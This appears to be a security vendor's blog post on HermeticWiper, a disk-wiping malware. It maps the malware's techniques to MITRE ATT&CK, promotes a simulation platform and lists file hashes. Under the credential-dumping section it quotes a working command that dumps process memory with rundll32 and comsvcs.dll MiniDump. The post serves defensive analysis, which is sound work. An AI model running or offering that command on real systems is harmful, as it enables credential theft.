On February 23rd, 2022, Eset and Symantec shared their research on a new type of destructive wiper malware and named it HermeticWiper [1],[2]. Picus Labs updated the Picus Threat Library with multiple HermeticWiper destructive malware attack simulations. In this blog, we share information on how to simulate and mitigate HermeticWiper attacks.
Test your security controls against HermeticWiper Malware
HermeticWiper is a disk-wiping destructive malware that disguises itself as ransomware similar to NotPetya and WhisperGate wiper malware. The wiper damages Master Boot Record (MBR) and bricks the infected system. Then, HermeticWiper drops a ransom note. The ransom note should not be trusted because it is impossible to recover data after the MBR is damaged.
The wiper malware gains initial access to its target using SMB and Tomcat vulnerabilities found in its endpoint devices. Once it gains initial access, HermeticWiper malware downloads a malicious JPEG file using encoded PowerShell commands. After the download, a series of scheduled tasks are set in the victim system that checks network connectivity and dumps credentials. For its final act, the malware deploys a wiper (Trojan.KillDisk) and damages the MBR irrevocably.
Using the Picus Continuous Security Validation Platform, you can test your security controls against the HermeticWiper malware. We advise you to simulate destructive HermeticWiper malware attacks and determine whether your security controls can prevent them or not. Picus Threat Library includes the following threats to simulate HermeticWiper.
| Threat Name | 
| HermeticWiper Wiper Malware .EXE File Download (3 variants) | 
T1190 Exploit Public Facing Application
HermeticWiper destructive malware exploits SMB and Tomcat vulnerabilities found on the target's endpoint devices to place a webshell.
T1053.005 Scheduled Task/Job: Scheduled Task
HermeticWiper malware utilizes Scheduled Tasks to run CertUtil. CertUtil checks connectivity to trustsecpro.com and whatismyip.com.
T1059.001 Command and Scripting Interpreter: PowerShell
T1059.003 Command and Scripting Interpreter: Windows Command Shell
The HermeticWiper uses PowerShell and Windows Command Shell to execute its malicious commands. The malicious commands are used to download additional payloads and the wiper from a compromised webserver that adversaries control.
T1505.003 Server Software Component: Web Shell
After initial access, HermeticWiper places a webshell to establish a solid foothold in the victim’s network.
T1070.004 Indicator Removal on Host: File Deletion
HermeticWiper is a wiper malware that deletes the Master Boot Record (MBR) and files in the victim system. It also deletes itself to evade malware analysis.
T1218.011 Signed Binary Proxy Execution: Rundll32
HermeticWiper uses built-in Rundll32 executable for credential dumping.
T1553.002 Subvert Trust Controls: Code Signing
HermeticWiper masquerades itself as a legitimate binary because the executable is signed by a certificate from Hermetica Digital.
T1003 OS Credential Dumping
HermeticWiper malware uses the following command for credential dumping.
| cmd.exe /Q /c powershell -c "rundll32 C:\windows\system32\comsvcs.dll MiniDump 600 C:\asm\appdata\local\microsoft\windows\winupd.log full" 1> \\127.0.0.1\ADMIN$\__1638457529.1247072 2>&1 | 
T1012 Query Registry
HermeticWiper checks the language settings and name of the infected computer by querying the related registries given below.
| Registry | Key | 
| HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\EXTENDEDLOCALE | EN-US | 
| HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\CUSTOMLOCALE | EN-US | 
| HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\CUSTOMLOCALE | EMPTY | 
| HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME | COMPUTERNAME | 
T1082 System Information Discovery
HermeticWiper reads the cryptographic machine GUID from the “MACHINEGUID“ key of “HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY“ registry.
T1561.002 Disk Wipe: Disk Structure Wipe
HermeticWiper irreversibly damages the Master Boot Record (MBR) of the victim’s system. As a result, the victim's computer does not boot up.
| MD5 | SHA-1 | SHA-256 | 
| d5d2c4ac6c724cd63b69ca054713e278 | f32d791ec9e6385a91b45942c230f52aff1626df | 4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 | 
| 84ba0197920fd3e2b7dfa719fee09d2f | 912342f1c840a42f6b74132f8a7c4ffe7d40fb77 | 0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da | 
| 3f4a16b29f2f0532b7ce3e7656799125 | 61b25d11392172e587d8da3045812a66c3385451 | 1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 | 
[1] “HermeticWiper: New data‑wiping malware hits Ukraine”, WeLiveSecurity, 24 February 2022. [Online]. Available at: https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine/.
[2] “Ukraine: Disk-wiping Attacks Precede Russian Invasion”. [Online]. Available at: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia.